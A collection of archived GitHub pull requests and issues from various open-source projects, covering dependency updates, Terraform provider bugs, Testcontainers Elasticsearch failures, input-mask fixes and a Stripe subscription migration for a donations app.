chore(deps): update common-dev-assets digest to 65fb570
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
0aaf07b -> 65fb570
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
|
gharchive/pull-request
| 2024-12-28T09:01:20 |
2025-04-01T04:36:03.329263
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-secrets-manager-secret-group",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-secrets-manager-secret-group/pull/237",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2553942959
|
chore(deps): update ci dependencies
This PR contains the following updates:
Package
Type
Update
Change
common-dev-assets
digest
0685378 -> 51475f0
github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper
require
minor
v1.38.3 -> v1.39.3
Release Notes
terraform-ibm-modules/ibmcloud-terratest-wrapper (github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper)
v1.39.3
Compare Source
Bug Fixes
handle failed edge cases (#869) (42eef2a)
v1.39.2
Compare Source
Bug Fixes
add an additional check before Undeploy, to ensure we do not trigger while still deploying (#868) (f427c67)
v1.39.1
Compare Source
Bug Fixes
Fail if undeploy stack fails (#867) (7b83c71)
v1.39.0
Compare Source
Features
refactor of EPX stacks tests (#866) (57dd998)
v1.38.4
Compare Source
Bug Fixes
for potential nil response object from schematics (#865) (cb253f3)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
ℹ Artifact update notice
File name: tests/go.mod
In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):
1 additional dependency was updated
Details:
Package
Change
github.com/IBM/project-go-sdk
v0.3.0 -> v0.3.6
/run pipeline
/run pipeline
/run pipeline
/run pipeline
ℹ Artifact update notice
File name: tests/go.mod
In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):
1 additional dependency was updated
Details:
Package
Change
github.com/IBM/project-go-sdk
v0.3.0 -> v0.3.6
/run pipeline
:tada: This PR is included in version 1.3.3 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-09-28T01:37:36 |
2025-04-01T04:36:03.349010
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-secrets-manager-secret",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-secrets-manager-secret/pull/189",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
607226078
|
github_repository_file cant update/overwrite existing files.
Terraform Version
Terraform v0.12.23
provider.aws v2.57.0
provider.github v2.6.1
provider.helm v1.1.1
provider.kubectl (unversioned)
provider.kubernetes v1.11.1
Affected Resource(s)
github_repository_file
Terraform Configuration Files
resource "github_repository_file" "kubectl_container_github_actions" {
repository = github_repository.kubectl_container.name
file = ".github/workflows/main.yml"
content = file("${path.module}/github-actions-config-files/kubectl-container.yaml")
}
( I unfortunately had to use a raw file like this due to https://github.com/hashicorp/terraform/issues/23322, specifically that yamlencode doesnt support multiline block key-name: | type strings. But the content of the file should not matter for this particular bug. )
Debug Output
Complete terraform log not provided for security reasons. The relevant section of the log, with a small security redaction is here. This shows both the output sent to and the response from GitHub, so I hope this is sufficient.
https://gist.github.com/techdragon/ed73032aa5ab062674886a6c7478935e
Expected Behavior
github_repository_file should be able to update files that already exist.
Actual Behavior
Terraform fails to update an existing file in a github repository.
Error: PUT https://api.github.com/repos/<REDACTED>/contents/.github/workflows/main.yml: 422 Invalid request.
"sha" wasn't supplied. []
Steps to Reproduce
terraform apply using a github_repository_file for the first time on a file that is already in the git repo.
Important Factoids
It is relatively easy to work around this by importing the file, but it would be good to provide a more user friendly experience than simply dropping the error message "sha" wasn't supplied directly from the upstream GitHub API. Either handling this, switching to update and "doing what the user wanted", or by emitting a more user friendly error message informing the user that they should import the resource first.
This would also make it easier to use template repositories, since the files in a template repository will exist after its created by a github_repository resource. Which then requires importing files created by the template before you can use github_repository_file resources to override their contents.
References
Hi @techdragon, thank you for submitting this issue! looking at the logs you've provided it does look like the provider is behaving as expected at apply time as information about the existing file is not known by terraform unless imported into state as you've suggested.
I do agree though that the error provided back to the user could be more detailed -- it looks like the Github API determines the file exists and attempts to do an update behind the scenes, but fails without a known sha and this error isn't reported back with better context. imo, I think providing better error messaging to a user is more feasible as the update-on-create behavior may conflict with the distinct CRUD operations expected in a resource.
@anGie44 thanks for digging in and working out the extra details that are going on with the GitHub API behind the scenes. I think a full resolution to the issue as it stands, needs to deal with two major details.
A better error response:
The default behaviour should definitely have a better error message. The heuristic (_ in pseudo code/flowchart form_) perform-create -> invoke error handling logic for perform-create -> check if the error response is for a version of the GitHub api where we trust this heuristic is valid -> check if the error response contains ' "sha" wasn't supplied. ' -> return better error message`... Should be sufficiently accurate with respect to catching only this particular error response case.
Functionality improvements
While its arguable that for 'normal' existing repositories, the user should be forced to add and import them before adding any terraform managed files... I can just see arguments for both sides with respect to the "existing" repo behaviour so I wont really argue one way or the other on this part.
The use cases for "template repositories" are varied, in a number of cases I can see completely managing the a repo through terraform, the simplest example I have on hand is creating a "GitHub Action Repo" from one of the templates provided by GitHub. Which you want to use as part of your CI/CD pipeline. In this example, you likely know what you're adding to the repo before you create it, and want to automate things so that any webhook URLs or other IDs of systems managed by terraform are kept up to date. Having to create the repo with one terraform run, then add file resources for the required files that will be in every GitHub action repo, import these files, and add the remainder of your repo files, before applying the final configuration, seems like unnecessary complication.
To handle these kind of situations, it doesn't seem like a bad idea to add a specific flag that indicates the user knows and is opting-in to an "Upsert-Like" behaviour of "perform file update if file creation fails in such a way that it indicates the file already exists". Having explicit opt-in seems like a sensible way to both support the useful behaviour, and prevent conflict with the normal expected CRUD behaviour of resource objects.
@techdragon thanks for sharing your use case and highlighting the incompatibility between template use and repository file management. I've been playing around with this locally and aim to push up a proposed fix that adds an overwrite flag.
Traditionally Terraform only manages what it knows about, so expecting it to update something it didn't create feels a bit unfair. I've seen a similar use case in other providers/resources and they will also generate an error that the resource already exists (we could catch the returned error and make it more user friendly though).
IMO the real solution here is to import the file into the state using terraform import and then Terraform will manage the file correctly.
|
gharchive/issue
| 2020-04-27T04:37:24 |
2025-04-01T04:36:03.396609
|
{
"authors": [
"anGie44",
"jcudit",
"shoekstra",
"techdragon"
],
"repo": "terraform-providers/terraform-provider-github",
"url": "https://github.com/terraform-providers/terraform-provider-github/issues/438",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2006687104
|
Sweeping crumbs for grammatical fixes
What is the change?
This PR sweeps the armi crumbs for grammatical fixes and tweaks.
Checklist
[x] This PR has only one purpose or idea.
[x] Tests have been added/updated to verify that the new/changed code works.
[x] The code style follows good practices.
[x] The commit message(s) follow good practices.
[x] The release notes (location doc/release/0.X.rst) are up-to-date with any important changes.
[x] The documentation is still up-to-date in the doc folder.
[x] No requirements were altered.
[x] The dependencies are still up-to-date in pyproject.toml.
Reviewing now.
|
gharchive/pull-request
| 2023-11-22T16:16:08 |
2025-04-01T04:36:03.488544
|
{
"authors": [
"bdlafleur",
"keckler"
],
"repo": "terrapower/armi",
"url": "https://github.com/terrapower/armi/pull/1488",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1966225028
|
SW-4366 Add more batch details
Add new details about seedling batches:
Germination rate
Loss rate
Substrate (enum)
Substrate notes
Treatment (enum)
Treatment notes
Germination and loss rates are currently always null; the calculations will be
added in a future change, but they're included here to reduce API churn.
Current dependencies on/for this PR:
main
PR #1433
PR #1432
PR #1428
PR #1434
PR #1435 👈
This comment was auto-generated by Graphite.
Current dependencies on/for this PR:
main
PR #1433
PR #1432
PR #1428
PR #1434
PR #1435 👈
This comment was auto-generated by Graphite.
|
gharchive/pull-request
| 2023-10-27T21:41:47 |
2025-04-01T04:36:03.498357
|
{
"authors": [
"sgrimm"
],
"repo": "terraware/terraware-server",
"url": "https://github.com/terraware/terraware-server/pull/1435",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1558904732
|
SW-2777 Use selected locale from Keycloak for new users
If a new user has selected a locale during registration, record it in their
Terraware user information.
Current dependencies on/for this PR:
main
PR #922 👈
This comment was auto-generated by Graphite.
|
gharchive/pull-request
| 2023-01-26T23:02:45 |
2025-04-01T04:36:03.500697
|
{
"authors": [
"sgrimm"
],
"repo": "terraware/terraware-server",
"url": "https://github.com/terraware/terraware-server/pull/922",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1538395144
|
SW-2658 Default date/time in nursery time zone for inventory add batch
Added timezone to create inventory and add batch.
Noticed that updating the "addedDate" when editing a batch doesn't update it in the backend, the api doesn't accept an addedDate. Is it correct that "addedDate" is editable in the frontend?
Added timezone to create inventory and add batch.
Noticed that updating the "addedDate" when editing a batch doesn't update it in the backend, the api doesn't accept an addedDate. Is it correct that "addedDate" is editable in the frontend?
I see that even if we edit addedDate, we don't pass the edited value to the BE, we pass the initial value. The BE does accept it. Could be a UI bug.
|
gharchive/pull-request
| 2023-01-18T17:30:54 |
2025-04-01T04:36:03.502631
|
{
"authors": [
"constanzauanini",
"karthikbtf"
],
"repo": "terraware/terraware-web",
"url": "https://github.com/terraware/terraware-web/pull/1045",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1334751341
|
Support plugins
This suggests to add support for plugins to the shogun-gis-client while using the module-federation plugin of webpack, that allows to split up applications into multiple builds to form a single one.
Following this approach a plugin for the gis client can be built as a completely standalone application and be chimed in by setting up a path for its sources easily. Generally speaking a plugin is just an exported object implementing the ClientPlugin type:
import {
faPuzzlePiece
} from '@fortawesome/free-solid-svg-icons';
import {
ClientPlugin
} from '@terrestris/shogun-gis-client/plugin';
export const TestPlugin: ClientPlugin = {
key: 'example-plugin',
component: () => {
return <span>Example Plugin</span>
},
integration: {
placement: 'tool-menu',
insertionIndex: 1,
label: 'ExamplePlugin.menuLabel',
icon: faPuzzlePiece
},
i18n: {
de: {
translation: {
ExamplePlugin: {
menuLabel: 'de: Example Plugin'
}
}
},
en: {
translation: {
ExamplePlugin: {
menuLabel: 'en: Example Plugin'
}
}
}
},
reducers: {
examplePlugin: // a redux reducer function
}
};
Where:
key contains the ID of the plugin.
component contains the component itself (defined as react function component).
integration contains the placement options for the component. Actually it's possible to integrate the plugins to the ToolMenu only, other integration points as a map control or a footer element should might be implemented in follow ups as needed.
i18n contains the locales for the component.
reducers contain a list of redux reducers for the store handling.
The integration of the plugin is controlled in the gis-client-config.js:
plugins: [{
name: 'ExamplePlugin',
exposedPath: './Plugin',
resourcePath: '/client-plugin/index.js'
}]
The values correspond to the configuration of the ModuleFederationPlugin:
new ModuleFederationPlugin({
name: 'ExamplePlugin',
filename: 'index.js',
exposes: {
'./Plugin': './src/index'
}
});
Please review @terrestris/devs.
Thanks for the reviews!
|
gharchive/pull-request
| 2022-08-10T14:50:42 |
2025-04-01T04:36:03.509432
|
{
"authors": [
"dnlkoch"
],
"repo": "terrestris/shogun-gis-client",
"url": "https://github.com/terrestris/shogun-gis-client/pull/250",
"license": "BSD-2-Clause",
"license_type": "permissive",
"license_source": "github-api"
}
|
1607063640
|
🛑 teslam.in is down
In 5d98312, teslam.in (https://teslam.in/.well-known/nodeinfo) was down:
HTTP code: 530
Response time: 44 ms
Resolved: teslam.in is back up in eef5511.
|
gharchive/issue
| 2023-03-02T15:56:36 |
2025-04-01T04:36:03.523506
|
{
"authors": [
"teslamint"
],
"repo": "teslamint/uptime",
"url": "https://github.com/teslamint/uptime/issues/266",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
360140066
|
Text2image do not draw char_spacing correctly
Tesseract Open Source OCR Engine v4.0.0-beta.4-18-g4370
text2image 4.0.0-beta.4-18-g4370
Linux bogon 3.10.0-862.3.3.el7.x86_64
Current Behavior:
With resolution (PPI) = 300, 12pt equals 50px in font size
2.0 em I set in char_spacing should equals 100 px
By the way, I set leading to be 100px as a comparation
It is much less than 100px between characters
Is there anything I misunderstand?
100px spacing turns up to be 24px, which means that it is calculate with ppi 72 (300x0.24)
This value is very common in dpi, So I think maybe they are mixed up.
It is little bit confusing to using two standard together in one picture.
Looks like you found a bug :-)
Here's the relevant code
https://github.com/tesseract-ocr/tesseract/blob/d2febafdcdb80747a2365e85b52d9f4e3de586ab/src/training/text2image.cpp#L462
https://github.com/tesseract-ocr/tesseract/blob/5fdaa479da2c52526dac1281871db5c4bdaff359/src/training/stringrenderer.h#L68
https://github.com/tesseract-ocr/tesseract/blob/09f4179e89e235c95be99c0280805dd0735ccc84/src/training/stringrenderer.cpp#L194
Pango's relevant docs:
https://developer.gnome.org/pango/stable/pango-Text-Attributes.html#pango-attr-letter-spacing-new
https://developer.gnome.org/pango/stable/pango-Glyph-Storage.html#PANGO-SCALE:CAPS
Thank you so much for you help.
I'll change my code to fit the Pango units.
|
gharchive/issue
| 2018-09-14T03:04:57 |
2025-04-01T04:36:03.531013
|
{
"authors": [
"amitdo",
"zwwlouis"
],
"repo": "tesseract-ocr/tesseract",
"url": "https://github.com/tesseract-ocr/tesseract/issues/1907",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1427156228
|
All Elasticsearch module tests fail
Describe the bug
All Elasticsearch module tests fail on clean operating system.
To Reproduce
Steps to reproduce the behavior:
Install Docker desktop (Rancher desktop, Moby engine)
Run Elasticsearch module tests
All tests fail with following error message: Docker.DotNet.DockerApiException : Docker API responded with status code=Conflict, response={"message":"Container 776f26413636a94482827057706c065e5d697951e882c6a84a0827979d6aea6a is not running"}
Expected behavior
All tests should pass.
Screenshots
Desktop (please complete the following information):
version: 2.1.0
os: Windows 11 (WSL), Ubuntu Desktop 20.04 LTS
docker: Docker dekstop, Rancher Desktop, Moby engine (Microsoft build)
Additional context
Elasticsearch container does not want to start and fail. Container logs provide the following evidences:
As the last log message: ERROR: [1] bootstrap checks failed. You must address the points described in the following [1] lines before starting Elasticsearch.
It refers to result of bootstrap check service: bootstrap check failure [1] of [1]: max virtual memory areas vm.max_map_count [65530] is too low, increase to at least [262144]
Based on the following discussions there is several ways how to solve it:
https://stackoverflow.com/questions/51445846/elasticsearch-max-virtual-memory-areas-vm-max-map-count-65530-is-too-low-inc
https://www.elastic.co/guide/en/cloud-on-k8s/master/k8s-virtual-memory.html
https://discuss.elastic.co/t/eck-elasticsearch-pod-not-starting-on-aks-max-virtual-memory-areas-vm-max-map-count-65530-is-too-low-increase-to-at-least-262144/305788
The last one contains information regarding disabling the bootstrap check for non production and for low memory clusters. I think this is the best approach to fix tests. I will try to provide a PR to fix this based on last option.
In Java, we implemented this change regarding default heapsize for ES, so it would probably help here as well?
https://github.com/testcontainers/testcontainers-java/pull/5684
Thank you @kiview for quick reply. I created an PR #641 where I disable bootstrap check and based on documentation disallow use mmap. Could you look at it and suggest if this is enough? Or should we solve it even for developers who uses this module for testing purpose or is their responsibility?
I am not that experience with the current module structure in the .NET implementation, but in general, if we can identify good default values for a container in the context of integration testing, it generally makes sense to make them part of the default module implementation.
I would favor to increase the default heap size too. Modules should contain a set of configurations that devs can immediately start. I think it is fine to set or override the env variable, for now. I would not prefer to mount the option files. @kiview what do you think?
In Java, we copy (don't mount) a default config file into the container before startup:
https://github.com/testcontainers/testcontainers-java/pull/5684/files#diff-8af1f477d2bcf3c11f31ecc8b703ce0873f869dbefd5714fa3c78810f02a7cc7R104
One of the reasons was also about the ENV approach being not a super stable integration point:
Elasticsearch 8 seems to have renamed ES_JAVA_OPTS to CLI_JAVA_OPTS on their docs https://www.elastic.co/guide/en/elasticsearch/reference/current/advanced-configuration.html. After testing, it seems like they have backwards compatibility for ES_JAVA_OPTS - but usage of both at the same time is unpredictable.
I will update the PR to have default value set up to minimal required value. I will try all possible ways to do it.
I am not sure if we can "copy" files like Java does at the moment. If not it would be a good opportunity to add it, otherwise we can simply use the Java approach right away.
Will investigate .NET possibilities
It looks like it is not supported yet, but we can add it without much effort I think. We simply copy read-only files (from IMountconfigurations) before the container starts. Here is a simple test:
diff --git a/src/Testcontainers/Containers/TestcontainersContainer.cs b/src/Testcontainers/Containers/TestcontainersContainer.cs
index 2b2a199..a3ca7bd 100644
--- a/src/Testcontainers/Containers/TestcontainersContainer.cs
+++ b/src/Testcontainers/Containers/TestcontainersContainer.cs
@@ -303,6 +303,9 @@ namespace DotNet.Testcontainers.Containers
var id = await this.client.RunAsync(this.configuration, ct)
.ConfigureAwait(false);
+ await this.client.CopyFileAsync(id, "/tmp/foo", Array.Empty<byte>(), 384, 0, 0, ct)
+ .ConfigureAwait(false);
+
return await this.client.InspectContainer(id, ct)
.ConfigureAwait(false);
}
OC, we need some more logic to detect which files we copy / directories we mount.
I was thinking same way but with full implementation. I will push it soon.
I thought about it too. I think we should move it to DockerContainerOperations or TestcontainersClient and then just filter the Mounts property.
_ = Task.WhenAll(configuration.Mounts
.Where(mount => AccessMode.ReadOnly.Equals(mount.AccessMode))
.Where(mount => File.Exists(mount.Source))
.Select(mount => this.CopyFileAsync(id, mount.Target, Array.Empty<byte>(), 420, 0, 0)));
Running the tests on Windows (WSL) I noticed that this issue is not related to the Elasticsearch JVM options. It is a host limitation:
https://www.elastic.co/guide/en/elasticsearch/reference/current/vm-max-map-count.html#vm-max-map-count
https://stackoverflow.com/a/66547784/690017
@kiview Do I miss anything? How does tc-java make sure the host is set up correct?
@kiview can you check following:
wsl -d docker-desktop
cat /proc/sys/vm/max_map_count
|
gharchive/issue
| 2022-10-28T11:59:24 |
2025-04-01T04:36:03.737429
|
{
"authors": [
"HofmeisterAn",
"kiview",
"vlaskal"
],
"repo": "testcontainers/testcontainers-dotnet",
"url": "https://github.com/testcontainers/testcontainers-dotnet/issues/640",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
357414245
|
Update Pulsar Container
Simply startup script using defaults.
Hi @aahmed-se! It seems that 2.2.0 is not released yet :D
my mistake it's actually another change for something else, will mark it wip for now
This is ready for review now
Comments addressed
Made the changes
@bsideup let me know if there any more comments.
@bsideup is there anything else to change ?
@aahmed-se it looks great, thank you 👍
Released for preview in 1.9.0-rc2, to be published on Bintray.
Thanks @aahmed-se!
|
gharchive/pull-request
| 2018-09-05T21:38:33 |
2025-04-01T04:36:03.741246
|
{
"authors": [
"aahmed-se",
"bsideup",
"rnorth"
],
"repo": "testcontainers/testcontainers-java",
"url": "https://github.com/testcontainers/testcontainers-java/pull/858",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1006548038
|
erreur 1ere connection : Réessayer la configuration: None
Bonjour,
après 24h de fonctionnement, j'ai toujours le même message d'erreur "Réessayer la configuration: None"
et des messages dans la log voir ci-dessous.
Pourtant sur le site https://www.eau-services.com/ j'ai bien les données jours/heures. (site veolia méditerranée)
As-tu une idée ?
Merci
log ******************
2021-09-24 16:44:56 ERROR (MainThread) [custom_components.veolia] Unexpected error fetching veolia consumption update data: 'consommation(litre)'
Traceback (most recent call last):
File "/usr/src/homeassistant/homeassistant/helpers/update_coordinator.py", line 187, in _async_refresh
self.data = await self._async_update_data()
File "/usr/src/homeassistant/homeassistant/helpers/update_coordinator.py", line 147, in _async_update_data
return await self.update_method()
File "/config/custom_components/veolia/init.py", line 71, in _get_consumption
daily_consumption = await api.get_consumption(
File "/usr/local/lib/python3.9/site-packages/backoff/_async.py", line 133, in retry
ret = await target(*args, **kwargs)
File "/usr/local/lib/python3.9/site-packages/pyolia/client.py", line 100, in get_consumption
return await self._get_daily_consumption(month, year)
File "/usr/local/lib/python3.9/site-packages/pyolia/client.py", line 109, in _get_daily_consumption
return [int(row[CONSUMPTION_HEADER]) for row in reader]
File "/usr/local/lib/python3.9/site-packages/pyolia/client.py", line 109, in
return [int(row[CONSUMPTION_HEADER]) for row in reader]
KeyError: 'consommation(litre)'
Je rencontre en effet le même soucis. Je vais voir courant de la semain prochaine d’où cela peut venir.
Le soucis est maintenant corrigé avec la version 0.3.3.
bonjour
tout fonctionne
merci a toi
pierre
Le lun. 27 sept. 2021 à 09:47, Thibaut @.***> a écrit :
Le soucis est maintenant corrigé avec la version 0.3.3.
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
https://github.com/tetienne/veolia-custom-component/issues/29#issuecomment-927616476,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/ASZS7RXNNTWFH4XAFPQ5ALDUEAOP3ANCNFSM5EWEEZQA
.
Triage notifications on the go with GitHub Mobile for iOS
https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675
or Android
https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.
|
gharchive/issue
| 2021-09-24T14:51:52 |
2025-04-01T04:36:03.806451
|
{
"authors": [
"mathep34",
"tetienne"
],
"repo": "tetienne/veolia-custom-component",
"url": "https://github.com/tetienne/veolia-custom-component/issues/29",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1413160147
|
Update README.md
just a simple misspelled.
build.example had actually existed before (https://github.com/tetratelabs/proxy-wasm-go-sdk/blob/4e9b9116c8a617570a4976c1f6822c8fefc5cae4/Makefile#L4-L8) but accidentally deleted in https://github.com/tetratelabs/proxy-wasm-go-sdk/commit/3851b164108c97390e03c4e314ddbd97b509272e#diff-76ed074a9305c04054cdebb9e9aad2d818052b07091de1f20cad0bbac34ffb52. Could you rescue build.example rather than fix typo?
makes sense. this is a new PR
fyi you don't need to close the PR - you can repurpose it and that's really normal thing on GitHub
|
gharchive/pull-request
| 2022-10-18T12:41:25 |
2025-04-01T04:36:03.809340
|
{
"authors": [
"mathetake",
"omidtavakoli"
],
"repo": "tetratelabs/proxy-wasm-go-sdk",
"url": "https://github.com/tetratelabs/proxy-wasm-go-sdk/pull/335",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
435925549
|
Compress exponents of dim a bit more.
Initially, dim was implemented as an array of character-sized rational-exponents. But with five fundamental dimensions, any non-constexpr instance of dim would consume more than a four-byte word, especially when padded as in dyndim.
Class rational has already been modified so that it can use a number of bits that is not a multiple of eight.
The next step is to modify dim so that, say, each dimension's exponent is a rational number with four bits for the numerator and two for the denominator. Then the set of dimensional exponents would fit in 30 bits, in a single 32-bit word.
Issue is fixed by previous commit (b6f7fff).
|
gharchive/issue
| 2019-04-22T22:55:06 |
2025-04-01T04:36:03.820440
|
{
"authors": [
"tevaughan"
],
"repo": "tevaughan/units",
"url": "https://github.com/tevaughan/units/issues/2",
"license": "BSD-3-Clause",
"license_type": "permissive",
"license_source": "github-api"
}
|
1815767733
|
Move circle to subscriptions
What's this PR do?
Adds stripe scheduled subscription creation to our /circle membership form. Also uses our new stripe webhooks functionality to listen for subscription creation success events from business membership submission and logs recurring donations and opportunities in Salesforce respectively.
Why are we doing this? How does it help us?
This is the next step in a larger modernization project for the donations app that will give us a more reliable and less brittle system for handling recurring donations. This update modernizes the /circle donation form in particular, bringing all of our forms in line with using stripe subscriptions (and scheduled subscriptions, in this case) where applicable.
How should this be manually tested?
Visit the circle form on staging
Try giving donations for different tiers (i.e. "Editor's", "Founders'", etc.), at different intervals, with or without agreeing to cover fees using a test card
For each of these donations...
In our stripe dashboard, make sure you are in "Test Mode" (upper corner)
Choose the "Customers" tab and you should see the donation you made, listed by the First Name/Last Name you provided
Clicking through to the customer you added should show a screen listing a Circle subscription
Since circle memberships only last for 3 years, you will find cancel info tied to the subscription as seen in the above screenshot
Login to our salesforce sandbox (deets listed under "Salesforce Test (2023 refactor)")
Follow the instructions here to ensure that the donation came through on the salesforce end as expected
How should this change be communicated to end users?
We'll let membership team know when this is deployed.
Are there any smells or added technical debt to note?
The handling of stripe products is admittedly messy. The hope is that when we refactor the frontend, we can incorporate some more stripe pieces and have the products/prices loaded with the rest of the page instead of being referenced/grabbed here in the midst of the post request.
Aside from that, after these updates and updates for quarantined records are out in the wild and working, we should be able to remove a lot of the older code this is replacing.
What are the relevant tickets?
https://airtable.com/appyo1zuQd8f4hBVx/tbloNZu8GkM52NKFR/viwS1XPty68eK4Ett/recwk25CEwmxFf1cm?blocks=hide
Have you done the following, if applicable:
(optional: add explanation between parentheses)
[ ] Added automated tests? ( )
[ ] Tested manually on mobile? ( )
[ ] Checked BrowserStack? ( )
[ ] Checked for performance implications? ( )
[ ] Checked accessibility? ( )
[ ] Checked for security implications? ( )
[ ] Updated the documentation/wiki? ( )
TODOs / next steps:
[ ] your TODO here
@matthewdylan something I'm seeing right away is that the amounts and some data seems incorrect in Salesforce.
Example scenario:
Account: testpr1088-ec@foo.com
Level: Filled out form as Editor's Circle Yearly w/ fees
Salesforce results:
Expected: Three separate $1000 opportunities in Salesforce
Saw: Three separate $3000 opportunities in Salesforce
Expected: Test PR1088-EditorsCircle contact info shows Editor's Circle
Saw: Test PR1088-EditorsCircle contact info shows Leadership Circle
@matthewdylan - I'm getting quarantined again. I think we should update this branch with master to test it with the other pieces in place
@matthewdylan something I'm seeing right away is that the amounts and some data seems incorrect in Salesforce.
Example scenario:
Account: testpr1088-ec@foo.com
Level: Filled out form as Editor's Circle Yearly w/ fees
Salesforce results:
Expected: Three separate $1000 opportunities in Salesforce
Saw: Three separate $3000 opportunities in Salesforce
* _Expected_: Test PR1088-EditorsCircle contact info shows `Editor's Circle`
* _Saw_: Test PR1088-EditorsCircle contact info shows `Leadership Circle`
We talked through this one in slack, but ultimately, the issue was resolved by setting the open ended status on the rdo to "None" instead of "Open".
@matthewdylan - I'm getting quarantined again. I think we should update this branch with master to test it with the other pieces in place
Good catch on this one. Updated to be in line with master earlier this morning.
Overall this looks great @matthewdylan! 🎉 👏🏼 I tried every combination 😵
I did have one question though. I know "pledged" opportunities do not include fees, but are "closed won" opportunities supposed to have the fee if selected? also noting that the fee was correctly reported on stripe.
Thanks for reviewing @djpeacher... I was able to resolve this issue by forcing the first invoice tied to the subscription to finalize and pay out before updating the opportunity. The other subscriptions do this automatically, but since these circle subscriptions use scheduled subscriptions to set an end date for the subscription, the first invoice is handled a little differently for whatever reason.
|
gharchive/pull-request
| 2023-07-21T12:57:48 |
2025-04-01T04:36:03.839475
|
{
"authors": [
"ashley-hebler",
"matthewdylan"
],
"repo": "texastribune/donations",
"url": "https://github.com/texastribune/donations/pull/1088",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
328974329
|
Fix deleting "static" chars for react text mask (#230, #483, #778 etc.)
Remove unnecessary componenDidUpdate
Add PureComponent for unnecessary re-render
Add test for correct deleting "static" chars
I've tested my solution in my own project and with all examples from the website.
The problem was in the unnecessary updating mask value in the componentDidMount, because firstly textMaskInputElement.update() called in onChange method, and then in componentDidMount.
The tree of calls:
StatefulComponent.render()
MaskedInput.render()
MaskedInput.componentDidMount() (where calls textMaskInputElement.update() in initTextMask)
Make changes in input
MaskedInput.onChange(event) (calls textMaskInputElement.update())
StatefulComponent.onChange() (calls setState)
StatefulComponent.render()
MaskedInput.render()
MaskedInput.componentDidUpdate (where calls textMaskInputElement.update() in initTextMask) //and this step is unnecessary, because we already apply mask update in onChange event
I hope it's clear explanation, if not, feel free to clarify :)
Pulled down your branch and can confirm it fixes the problem for our project as well. Thank you 👍 😄 💃
@mzedeler @lozjackson could you take a look at my PR and give your opinion?
At the moment react-text-mask installs from my branch with that fix, but would like to take from npm repository, as other users :)
Thank you!
Thanks for your contribution!
I have taken a look at the code and haven't seen anything that looks wrong. It would be nice if you could find out if there are any other scenarios that would benefit from react testing, but if the answer is "no", then I think we should merge this fix.
@mzedeler I see one problem, but this is not critical, as what I fixed already.
Other problem, as I see, that value in onChange(event) //event.target.value is different with value in input element after textMaskInputElement.update()
Initial (123) 4
Delete 4
event.target.value === "(123) "
After textMaskInputElement.update() input.value === "(123", but event.target.value stays with "(123) "
That not critical, but it can surprise some developers :)
For that I would like make separate PR...
Maybe just add a note in the documentation for this?
Yeap, note in the documentation is a good idea!
Could you include the change to the documentation in this PR?
LGTM :-)
@lozjackson?
@lozjackson yes, sure, I will do what you propose, but in a few days, as I have many work right now :(
@lozjackson is it OK now?
|
gharchive/pull-request
| 2018-06-04T09:21:38 |
2025-04-01T04:36:03.894000
|
{
"authors": [
"DTupalov",
"miketamis",
"mzedeler"
],
"repo": "text-mask/text-mask",
"url": "https://github.com/text-mask/text-mask/pull/801",
"license": "Unlicense",
"license_type": "permissive",
"license_source": "github-api"
}
|
662340113
|
Updates for Powergate changes
Updating in preparation for https://github.com/textileio/powergate/pull/526 to get merged
Almost all changes are in generated files under docs/powergate/cli so look for the files not in that folder for real updates
|
gharchive/pull-request
| 2020-07-20T22:42:39 |
2025-04-01T04:36:03.899095
|
{
"authors": [
"asutula"
],
"repo": "textileio/docs",
"url": "https://github.com/textileio/docs/pull/195",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
450399719
|
ipfs.metrics.scope error -> TODO: mock repo
When adding files, I see this with the new App based IPFS setup:
08:47:14.800 ERROR core: failure on stop: context canceled; TODO: mock repo builder.go:36
